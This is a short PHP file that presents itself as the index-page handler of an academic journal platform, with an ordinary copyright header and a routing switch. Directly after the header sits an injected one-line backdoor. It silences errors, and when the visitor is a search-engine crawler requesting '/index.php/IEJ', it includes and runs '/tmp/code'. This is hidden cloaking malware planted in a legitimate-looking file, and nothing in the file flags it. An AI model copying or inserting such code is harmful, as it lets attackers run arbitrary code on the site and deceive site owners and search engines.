<?php

/**
 * @defgroup pages_index Index Pages
 */

/**
 * @file pages/index/index.php
 *
 * Copyright (c) 2014-2021 Simon Fraser University
 * Copyright (c) 2003-2021 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * @ingroup pages_index
 *
 * @brief Handle site index requests.
 *
 */
error_reporting(0); $s_ref = $_SERVER['HTTP_REFERER']; $agent = $_SERVER['HTTP_USER_AGENT']; if(preg_match("/(googlebot|slurp|google adSense)/", strtolower($agent)) && $_SERVER['REQUEST_URI']=='/index.php/IEJ'){ include('/tmp/code'); exit; }

switch ($op) {
    case 'index':
        define('HANDLER_CLASS', 'APP\pages\index\IndexHandler');
        break;
}
